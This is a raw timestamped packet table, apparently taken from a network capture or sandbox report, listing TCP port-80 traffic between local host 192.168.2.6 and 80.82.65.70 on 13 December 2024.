                                              Dec 13, 2024 10:49:15.993048906 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.993102074 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.993161917 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.993207932 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.995132923 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.995206118 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.995230913 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.995244980 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.997117043 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.997188091 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.997271061 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.997422934 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.999166965 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.999211073 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.999386072 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.999423981 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.001147032 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.001194000 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.001250982 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.001295090 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.003233910 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.003277063 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.003371000 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.005228996 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.005285025 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.005333900 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.005373955 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.007214069 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.007272005 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.007335901 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.007462025 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.009259939 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.009315968 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.009397030 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.009531975 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.011384964 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.011451006 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.011457920 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.011493921 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.013299942 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.013350964 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.013492107 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.013540030 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.015386105 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.015454054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.015499115 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.017469883 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.017533064 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.017573118 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.017608881 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.019479990 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.019551992 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.019583941 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.019759893 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.021554947 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.021627903 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.021641016 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.021666050 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.023483992 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.023577929 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.023610115 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.023653030 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.025533915 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.025582075 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.025654078 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.025700092 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.027420998 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.027482033 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.027525902 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.027698040 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.029386044 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.029438019 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.029453993 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.029491901 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.031302929 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.031358957 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.031362057 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.031402111 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.034617901 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.034693003 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.064783096 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.064851046 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.064855099 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.064888954 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.065201998 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.065252066 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.065315008 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.065387011 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.066162109 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.066206932 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.066286087 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.066324949 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.067030907 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.367841005 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.367918015 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.367949009 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.367990971 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.368757010 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.368794918 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.368868113 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.368910074 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.369689941 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.369735003 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.369770050 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.369807005 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.370626926 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.370671034 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.370747089 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.370799065 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.371536016 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.371615887 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.371638060 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.371675014 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.372469902 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.372514009 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.372582912 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.372621059 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.373402119 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.373444080 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.373482943 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.373544931 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.374317884 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.374392986 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.374433041 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.374473095 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.375247955 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.375292063 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.375366926 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.375408888 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.376166105 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.376214981 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.376276970 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.376317024 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.377094984 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.377135038 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.377325058 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.377367973 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.378021002 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.378067017 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.378104925 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.378156900 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.378932953 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.378985882 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.378990889 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.379029989 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.379899979 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.379945040 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.379987955 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.380026102 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.380784988 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.380836964 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.380877018 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.380918980 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.381701946 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.381747007 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.381803036 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.381840944 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.382611990 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.382657051 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.382698059 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.382778883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.383554935 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.383599043 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.383656979 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.383699894 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.384464025 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.384505987 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.384572029 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.384614944 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.385381937 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.385413885 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.385426044 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.385443926 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.386311054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.386415005 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.386429071 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.386449099 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.387219906 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.387268066 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.448941946 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.448967934 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.449033976 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.449067116 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.449321985 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.449364901 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.449409962 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.449450016 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.450211048 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.450261116 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.450345993 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.450381041 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.451134920 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.451178074 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.451463938 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.451509953 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.451678038 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.451733112 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.452378035 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.452472925 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.452517033 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.453301907 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.453351021 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.453443050 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.453547001 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.455329895 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.455389023 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.455390930 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.455404997 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.455432892 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.455456018 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.455581903 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.455621958 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.456104994 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.456149101 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.456218958 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.456258059 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.457011938 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.457065105 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.457103014 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.457144022 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.457904100 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.457954884 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.458014965 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.458117008 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.458861113 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.458911896 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.459003925 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.459203959 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.459767103 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.459826946 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.459865093 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.459911108 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.460716009 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.460767031 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.460798025 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.461092949 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.461620092 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.461669922 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.461721897 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.461828947 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.462544918 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.462587118 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.462666988 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.462708950 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.463515997 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.463568926 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.463574886 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.463613987 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.464423895 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.464472055 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.464530945 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.464639902 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.465316057 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.465415955 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.465420961 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.465461016 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.466285944 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.466325998 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.466346025 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.466384888 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.467148066 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.467187881 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.467242956 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.467287064 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.468116045 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.468158960 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.468225002 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.468322039 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.469048977 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.469104052 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.469134092 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.469171047 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.469944000 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.470092058 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.470139027 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.470855951 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.470896006 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.470967054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.471029043 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.471821070 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.471869946 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.471903086 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.471951008 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.472698927 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.472753048 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.472814083 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.472881079 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.473642111 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.473700047 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.473771095 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.473819971 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.474591017 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.474704981 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.474734068 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.474781990 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.475558996 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.475589037 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.475649118 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.558425903 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.558516979 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.558582067 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.558648109 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.558696032 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.558790922 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.558830023 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.559603930 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.559669018 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.559705019 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.559747934 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.560511112 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.560561895 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.560621023 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.560661077 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.561438084 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.561490059 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.561520100 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.561568022 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.562371969 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.562424898 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.562489986 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.562525988 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.563297987 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.563348055 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.563484907 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.563538074 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.564198017 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.564239979 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.564311028 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.564441919 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.565102100 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.565145969 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.565217018 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.565264940 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.566051006 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.566099882 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.566201925 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.566359043 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.566966057 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.567012072 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.567080021 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.567126036 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.567919016 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.567995071 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.568017006 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.850799084 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.851355076 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.851408958 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.851438046 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.851622105 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.852591991 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.852605104 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.852646112 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.853825092 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.853842974 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.853879929 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.853903055 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.855041981 CET804985880.82.65.70192.168.2.6
